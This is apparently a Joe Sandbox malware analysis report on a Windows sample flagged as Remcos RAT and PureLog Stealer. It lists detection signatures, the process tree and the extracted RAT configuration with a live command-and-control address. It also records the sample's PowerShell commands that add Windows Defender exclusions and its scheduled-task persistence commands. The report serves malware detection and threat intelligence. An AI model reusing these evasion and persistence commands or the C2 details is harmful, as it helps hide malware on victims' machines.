Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PEbZthAqV9.exe

Overview

General Information

Sample name:PEbZthAqV9.exe
renamed because original name is a hash value
Original sample name:10ab4b6fb83aea3840ac04855974f62d.exe
Analysis ID:1570841
MD5:10ab4b6fb83aea3840ac04855974f62d
SHA1:c41572120bb8f298d4a8683321e7a3b1cc7c54da
SHA256:8c62537b7b875c364a79b98adaa8d341b4a52e4d0a27697f0f07b1209ed53301
Tags:exeRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Remcos RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PEbZthAqV9.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\PEbZthAqV9.exe" MD5: 10AB4B6FB83AEA3840AC04855974F62D)
    • powershell.exe (PID: 7664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8120 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7792 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PEbZthAqV9.exe (PID: 7952 cmdline: "C:\Users\user\Desktop\PEbZthAqV9.exe" MD5: 10AB4B6FB83AEA3840AC04855974F62D)
  • myTuDsvNcebev.exe (PID: 8016 cmdline: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe MD5: 10AB4B6FB83AEA3840AC04855974F62D)
    • schtasks.exe (PID: 1740 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • myTuDsvNcebev.exe (PID: 5964 cmdline: "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe" MD5: 10AB4B6FB83AEA3840AC04855974F62D)
    • myTuDsvNcebev.exe (PID: 5776 cmdline: "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe" MD5: 10AB4B6FB83AEA3840AC04855974F62D)
    • myTuDsvNcebev.exe (PID: 4904 cmdline: "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe" MD5: 10AB4B6FB83AEA3840AC04855974F62D)
    • myTuDsvNcebev.exe (PID: 4268 cmdline: "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe" MD5: 10AB4B6FB83AEA3840AC04855974F62D)
    • myTuDsvNcebev.exe (PID: 2312 cmdline: "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe" MD5: 10AB4B6FB83AEA3840AC04855974F62D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["41.216.183.238:7112:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-Y7J88P", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.1910984680.000000000124B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000000.00000002.1834812761.0000000007410000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x67b50:$a1: Remcos restarted by watchdog!
        • 0xdd170:$a1: Remcos restarted by watchdog!
        • 0xfdf90:$a1: Remcos restarted by watchdog!
        • 0x680a8:$a3: %02i:%02i:%02i:%03i
        • 0xdd6c8:$a3: %02i:%02i:%02i:%03i
        • 0xfe4e8:$a3: %02i:%02i:%02i:%03i
        • 0x6842d:$a4: * Remcos v
        • 0xdda4d:$a4: * Remcos v
        • 0xfe86d:$a4: * Remcos v
        00000000.00000002.1831199918.0000000003D51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Click to see the 12 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.PEbZthAqV9.exe.7410000.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.PEbZthAqV9.exe.7410000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.PEbZthAqV9.exe.3d6e790.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                18.2.myTuDsvNcebev.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  18.2.myTuDsvNcebev.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x679e0:$a1: Remcos restarted by watchdog!
                  • 0x67f38:$a3: %02i:%02i:%02i:%03i
                  • 0x682bd:$a4: * Remcos v
                  Click to see the 22 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PEbZthAqV9.exe", ParentImage: C:\Users\user\Desktop\PEbZthAqV9.exe, ParentProcessId: 7412, ParentProcessName: PEbZthAqV9.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", ProcessId: 7664, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PEbZthAqV9.exe", ParentImage: C:\Users\user\Desktop\PEbZthAqV9.exe, ParentProcessId: 7412, ParentProcessName: PEbZthAqV9.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", ProcessId: 7664, ProcessName: powershell.exe
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe, ParentImage: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe, ParentProcessId: 8016, ParentProcessName: myTuDsvNcebev.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp", ProcessId: 1740, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PEbZthAqV9.exe", ParentImage: C:\Users\user\Desktop\PEbZthAqV9.exe, ParentProcessId: 7412, ParentProcessName: PEbZthAqV9.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp", ProcessId: 7792, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PEbZthAqV9.exe", ParentImage: C:\Users\user\Desktop\PEbZthAqV9.exe, ParentProcessId: 7412, ParentProcessName: PEbZthAqV9.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", ProcessId: 7664, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Scheduled temp file as task from temp location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PEbZthAqV9.exe", ParentImage: C:\Users\user\Desktop\PEbZthAqV9.exe, ParentProcessId: 7412, ParentProcessName: PEbZthAqV9.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp", ProcessId: 7792, ProcessName: schtasks.exe

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: Registry Key setAuthor: Joe Security: Data: Details: EF 8F 79 60 F6 B6 ED F0 50 2C BB F8 CB B9 E5 A7 44 E1 3A 21 42 C7 A1 50 C5 A2 05 0A 33 E5 7A 6D A5 5F B0 85 D7 49 4D 93 6C B8 88 7A 73 17 5B 7A 97 AA 02 3F 93 9E 83 50 9D 55 AD 39 0F C2 68 6A 01 37 0E 13 52 E5 4A 9E FA D6 9D BD , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PEbZthAqV9.exe, ProcessId: 7952, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-Y7J88P\exepath

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-08T09:04:13.806353+010020365941Malware Command and Control Activity Detected192.168.2.44973741.216.183.2387112TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-08T09:04:16.575929+010028033043Unknown Traffic192.168.2.449738178.237.33.5080TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["41.216.183.238:7112:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-Y7J88P", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeReversingLabs: Detection: 63%
                  Multi AV Scanner detection for submitted file
                  Source: PEbZthAqV9.exeReversingLabs: Detection: 63%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000012.00000002.1910984680.000000000124B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PEbZthAqV9.exe PID: 7412, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: PEbZthAqV9.exe PID: 7952, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: myTuDsvNcebev.exe PID: 2312, type: MEMORYSTR
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: PEbZthAqV9.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,18_2_004315EC
                  Source: PEbZthAqV9.exe, 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_8406356f-7
                  Source: PEbZthAqV9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: PEbZthAqV9.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: JzWg.pdbSHA256 source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.dr
                  Source: Binary string: JzWg.pdb source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.dr
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,18_2_0041A01B
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,18_2_0040B28E
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,18_2_0040838E
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,18_2_004087A0
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,18_2_00407848
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004068CD FindFirstFileW,FindNextFileW,18_2_004068CD
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,18_2_0040AA71
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,18_2_00417AAB
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,18_2_0040AC78
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,18_2_00406D28
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 4x nop then jmp 0754EFCAh0_2_0754F3B6

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49737 -> 41.216.183.238:7112
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorIPs: 41.216.183.238
                  Source: global trafficTCP traffic: 192.168.2.4:49737 -> 41.216.183.238:7112
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49738 -> 178.237.33.50:80
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.238
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,18_2_0041936B
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                  Source: PEbZthAqV9.exe, 00000008.00000002.4180380801.000000000128F000.00000004.00000020.00020000.00000000.sdmp, PEbZthAqV9.exe, 00000008.00000002.4180380801.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, PEbZthAqV9.exe, 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmp, myTuDsvNcebev.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: PEbZthAqV9.exe, 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, myTuDsvNcebev.exe, 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: PEbZthAqV9.exe, 00000008.00000002.4180380801.00000000012AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpi5H
                  Source: PEbZthAqV9.exe, 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpsystem32
                  Source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: PEbZthAqV9.exe, 00000000.00000002.1830115364.0000000002D98000.00000004.00000800.00020000.00000000.sdmp, myTuDsvNcebev.exe, 00000009.00000002.1931870695.0000000002BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: PEbZthAqV9.exe, 00000000.00000002.1833712267.0000000005580000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmls
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
